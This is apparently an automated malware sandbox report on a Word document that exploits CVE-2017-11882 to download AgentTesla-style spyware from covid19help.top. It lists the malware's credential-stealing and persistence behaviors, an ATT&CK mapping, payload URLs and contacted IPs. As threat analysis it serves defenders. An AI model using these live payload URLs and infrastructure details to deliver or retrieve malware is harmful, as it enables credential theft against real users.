                    Source: Yara matchFile source: 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.626533099.0000000002600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: obimohohj75.scr PID: 3128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: obimohohj75.scr PID: 3512, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: pgZzUFYKXcIRkU.exe PID: 3964, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 5.2.obimohohj75.scr.35e1930.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.obimohohj75.scr.361c350.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.obimohohj75.scr.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.obimohohj75.scr.361c350.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: obimohohj75.scr PID: 3128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: obimohohj75.scr PID: 3512, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts121
                    Windows Management Instrumentation                    		1
                    Scripting                    		1
                    DLL Side-Loading                    		21
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts33
                    Exploitation for Client Execution                    		1
                    DLL Side-Loading                    		111
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Command and Scripting Interpreter                    		1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		21
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    Scheduled Task/Job                    		Login HookLogin Hook1
                    Install Root Certificate                    		NTDS1
                    Query Registry                    		Distributed Component Object Model21
                    Input Capture                    		13
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing                    		LSA Secrets1
                    Process Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials141
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Masquerading                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Modify Registry                    		Proc Filesystem1
                    Remote System Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadow1
                    System Network Configuration Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                    Process Injection                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1427899 Sample: Scan 368 1.doc Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 62 Multi AV Scanner detection for domain / URL 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 15 other signatures 2->68 8 WINWORD.EXE 336 14 2->8         started        10 taskeng.exe 1 2->10         started        process3 process4 12 EQNEDT32.EXE 11 8->12         started        17 EQNEDT32.EXE 8->17         started        19 pgZzUFYKXcIRkU.exe 10->19         started        dnsIp5 60 covid19help.top 172.67.175.222, 443, 49163 CLOUDFLARENETUS United States 12->60 48 C:\Users\user\AppData\...\obimohohj75.scr, PE32 12->48 dropped 50 C:\Users\user\AppData\Local\...\xobizx[1].scr, PE32 12->50 dropped 94 Installs new ROOT certificates 12->94 96 Office equation editor establishes network connection 12->96 98 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->98 21 obimohohj75.scr 1 10 12->21         started        100 Multi AV Scanner detection for dropped file 19->100 102 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 19->102 104 Machine Learning detection for dropped file 19->104 106 2 other signatures 19->106 25 pgZzUFYKXcIRkU.exe 19->25         started        28 powershell.exe 19->28         started        30 powershell.exe 19->30         started        32 2 other processes 19->32 file6 signatures7 process8 dnsIp9 44 C:\Users\user\AppData\...\pgZzUFYKXcIRkU.exe, PE32 21->44 dropped 46 C:\Users\user\AppData\Local\...\tmp786B.tmp, XML 21->46 dropped 78 Multi AV Scanner detection for dropped file 21->78 80 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 21->80 82 Machine Learning detection for dropped file 21->82 90 3 other signatures 21->90 34 obimohohj75.scr 21->34         started        38 powershell.exe 4 21->38         started        40 powershell.exe 4 21->40         started        42 schtasks.exe 21->42         started        56 104.26.13.205, 443, 49165 CLOUDFLARENETUS United States 25->56 58 api.ipify.org 25->58 84 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 25->84 86 Tries to steal Mail credentials (via file / registry access) 25->86 88 Tries to harvest and steal ftp login credentials 25->88 92 2 other signatures 25->92 file10 signatures11 process12 dnsIp13 52 104.26.12.205, 443, 49164 CLOUDFLARENETUS United States 34->52 54 api.ipify.org 34->54 70 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 34->70 72 Tries to steal Mail credentials (via file / registry access) 34->72 74 Installs a global keyboard hook 34->74 76 Installs new ROOT certificates 38->76 signatures14

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Scan 368 1.doc47%VirustotalBrowse
                    Scan 368 1.doc47%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\obimohohj75.scr100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr26%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr47%VirustotalBrowse
                    C:\Users\user\AppData\Roaming\obimohohj75.scr26%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Roaming\obimohohj75.scr47%VirustotalBrowse
                    C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe26%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe47%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    covid19help.top25%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://ocsp.entrust.net030%URL Reputationsafe
                    https://api.ipif80%URL Reputationsafe
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                    http://ocsp.entrust.net0D0%URL Reputationsafe
                    https://covid19help.top/xobizx.scr24%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    covid19help.top
                    		172.67.175.222
                    		truetrueunknown
                    api.ipify.org
                    		172.67.74.152
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                        		high
                        https://covid19help.top/xobizx.scrtrueunknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://covid19help.top/xobizx.scrC:EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://covid19help.top/xobizx.scrjEQNEDT32.EXE, 00000002.00000002.341543164.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://account.dyn.com/obimohohj75.scr, 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              		high
                              http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://api.ipif8obimohohj75.scr, 0000000E.00000002.626533099.0000000002662000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://api.ipify.org/tobimohohj75.scr, 0000000E.00000002.626533099.000000000264D000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.626533099.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.0000000002241000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.chiark.greenend.org.uk/~sgtatham/putty/0EQNEDT32.EXE, 00000002.00000002.341543164.0000000000376000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr.2.dr, pgZzUFYKXcIRkU.exe.5.dr, xobizx[1].scr.2.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://covid19help.top/xobizx.scraEQNEDT32.EXE, 00000002.00000002.341543164.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://api.ipify.orgobimohohj75.scr, 0000000E.00000002.626533099.000000000266B000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://covid19help.top/tEQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://api.ipify.orgobimohohj75.scr, 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.626533099.000000000264D000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.626533099.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.0000000002241000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://covid19help.top/xobizx.scrkkC:EQNEDT32.EXE, 00000002.00000002.341543164.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://covid19help.top/dOzJEQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://api.ipify.org/Tobimohohj75.scr, 0000000E.00000002.626533099.000000000264D000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameobimohohj75.scr, 00000005.00000002.371272562.000000000261B000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 0000000D.00000002.378702669.000000000232B000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.626533099.000000000264D000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.626533099.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.0000000002241000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://covid19help.top/xobizx.scrY.EQNEDT32.EXE, 00000002.00000002.341543164.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        172.67.175.222
                                                        		covid19help.topUnited States
                                                        		13335CLOUDFLARENETUStrue
                                                        104.26.12.205
                                                        		unknownUnited States
                                                        		13335CLOUDFLARENETUSfalse
                                                        104.26.13.205
                                                        		unknownUnited States
                                                        		13335CLOUDFLARENETUSfalse

                                                        General Information

                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                        Analysis ID:1427899
                                                        Start date and time:2024-04-18 10:36:39 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 8m 11s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                        Number of analysed new started processes analysed:27
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:Scan 368 1.doc
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.expl.evad.winDOC@26/22@5/3
                                                        EGA Information:
                                                        • Successful, ratio: 80%
                                                        HCA Information:
                                                        • Successful, ratio: 94%
                                                        • Number of executed functions: 225
                                                        • Number of non-executed functions: 19
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .doc
                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                        • Attach to Office via COM
                                                        • Active ActiveX Object
                                                        • Scroll down
                                                        • Close Viewer

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                        • Execution Graph export aborted for target EQNEDT32.EXE, PID 2152 because there are no executed function
                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        01:37:31Task SchedulerRun new task: pgZzUFYKXcIRkU path: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
                                                        10:37:23API Interceptor288x Sleep call for process: EQNEDT32.EXE modified
                                                        10:37:26API Interceptor924173x Sleep call for process: obimohohj75.scr modified
                                                        10:37:30API Interceptor74x Sleep call for process: powershell.exe modified
                                                        10:37:31API Interceptor3x Sleep call for process: schtasks.exe modified
                                                        10:37:32API Interceptor375x Sleep call for process: taskeng.exe modified
                                                        10:37:33API Interceptor427203x Sleep call for process: pgZzUFYKXcIRkU.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        172.67.175.222http://cya.nz/citizenzcomGet hashmaliciousUnknownBrowse
                                                        • cya.nz/citizenzcom
                                                        104.26.12.205Sky-Beta.exeGet hashmaliciousStealitBrowse
                                                        • api.ipify.org/?format=json
                                                        SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                                                        • api.ipify.org/
                                                        lods.cmdGet hashmaliciousRemcosBrowse
                                                        • api.ipify.org/
                                                        104.26.13.205SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                        • api.ipify.org/
                                                        Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                        • api.ipify.org/?format=json
                                                        ArenaWarSetup.exeGet hashmaliciousStealitBrowse
                                                        • api.ipify.org/?format=json
                                                        Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/?format=json
                                                        E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        SecuriteInfo.com.Win64.RATX-gen.31127.4101.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                        • api.ipify.org/

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        covid19help.topmsXkgFIUyS.rtfGet hashmaliciousAgentTeslaBrowse
                                                        • 104.21.83.128
                                                        BANK LETTER.docGet hashmaliciousAgentTeslaBrowse
                                                        • 104.21.83.128
                                                        You2bjAMeg.docGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.21.83.128
                                                        Arrival Notice.docGet hashmaliciousUnknownBrowse
                                                        • 172.67.175.222
                                                        PO.docGet hashmaliciousRemcosBrowse
                                                        • 104.21.83.128
                                                        #1337.docGet hashmaliciousUnknownBrowse
                                                        • 172.67.175.222
                                                        r29EHJocKX.rtfGet hashmaliciousUnknownBrowse
                                                        • 104.21.83.128
                                                        aaaaaa.docx.docGet hashmaliciousUnknownBrowse
                                                        • 172.67.175.222
                                                        aaaaaa.docx.docGet hashmaliciousUnknownBrowse
                                                        • 104.21.83.128
                                                        APMR1GTlQS.rtfGet hashmaliciousUnknownBrowse
                                                        • 104.21.83.128
                                                        api.ipify.orgPurchase Order PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.13.205
                                                        Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 172.67.74.152
                                                        p silp AI240190.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        SecuriteInfo.com.Win32.PWSX-gen.1728.1300.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        SecuriteInfo.com.Heur.15333.25205.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 172.67.74.152
                                                        Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 172.67.74.152
                                                        SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        SecuriteInfo.com.Win32.MalwareX-gen.3610.30636.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.13.205
                                                        invoice & packing list.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 172.67.74.152
                                                        ZG17uv37pi.exeGet hashmaliciousUnknownBrowse
                                                        • 104.26.13.205

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousRisePro StealerBrowse
                                                        • 104.26.4.15
                                                        dendy.exeGet hashmaliciousRisePro StealerBrowse
                                                        • 104.26.5.15
                                                        5Dw2hTQmiB.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.44.10
                                                        Purchase Order PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.13.205
                                                        file.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.44.10
                                                        Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 172.67.74.152
                                                        p silp AI240190.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        https://ortelia.com/Downloads/Curator/CuratorSetup.exeGet hashmaliciousHavocBrowse
                                                        • 1.1.1.1
                                                        https://app.esign.docusign.com/e/er?utm_campaign=GBL_XX_DBU_NEW_2307_FreetoTrialUnlock_Email1AU&utm_medium=email&utm_source=Eloqua&elqCampaignId=29542&s=566810826&lid=32871&elqTrackId=1034fb987fd44c9a9a4d0833ff06a55d&elq=89d72859fe264966a0176d4309dbb1a6&elqaid=60251&elqat=1Get hashmaliciousUnknownBrowse
                                                        • 172.64.151.101
                                                        https://ortelia.com/download-ortelia-curator/Get hashmaliciousHavocBrowse
                                                        • 1.1.1.1
                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousRisePro StealerBrowse
                                                        • 104.26.4.15
                                                        dendy.exeGet hashmaliciousRisePro StealerBrowse
                                                        • 104.26.5.15
                                                        5Dw2hTQmiB.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.44.10
                                                        Purchase Order PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.13.205
                                                        file.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.44.10
                                                        Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 172.67.74.152
                                                        p silp AI240190.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        https://ortelia.com/Downloads/Curator/CuratorSetup.exeGet hashmaliciousHavocBrowse
                                                        • 1.1.1.1
                                                        https://app.esign.docusign.com/e/er?utm_campaign=GBL_XX_DBU_NEW_2307_FreetoTrialUnlock_Email1AU&utm_medium=email&utm_source=Eloqua&elqCampaignId=29542&s=566810826&lid=32871&elqTrackId=1034fb987fd44c9a9a4d0833ff06a55d&elq=89d72859fe264966a0176d4309dbb1a6&elqaid=60251&elqat=1Get hashmaliciousUnknownBrowse
                                                        • 172.64.151.101
                                                        https://ortelia.com/download-ortelia-curator/Get hashmaliciousHavocBrowse
                                                        • 1.1.1.1
                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousRisePro StealerBrowse
                                                        • 104.26.4.15
                                                        dendy.exeGet hashmaliciousRisePro StealerBrowse
                                                        • 104.26.5.15
                                                        5Dw2hTQmiB.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.44.10
                                                        Purchase Order PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.13.205
                                                        file.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.44.10
                                                        Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 172.67.74.152
                                                        p silp AI240190.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        https://ortelia.com/Downloads/Curator/CuratorSetup.exeGet hashmaliciousHavocBrowse
                                                        • 1.1.1.1
                                                        https://app.esign.docusign.com/e/er?utm_campaign=GBL_XX_DBU_NEW_2307_FreetoTrialUnlock_Email1AU&utm_medium=email&utm_source=Eloqua&elqCampaignId=29542&s=566810826&lid=32871&elqTrackId=1034fb987fd44c9a9a4d0833ff06a55d&elq=89d72859fe264966a0176d4309dbb1a6&elqaid=60251&elqat=1Get hashmaliciousUnknownBrowse
                                                        • 172.64.151.101
                                                        https://ortelia.com/download-ortelia-curator/Get hashmaliciousHavocBrowse
                                                        • 1.1.1.1

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        7dcce5b76c8b17472d024758970a406byDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                        • 172.67.175.222
                                                        DETAILS.docx.docGet hashmaliciousRemcosBrowse
                                                        • 172.67.175.222
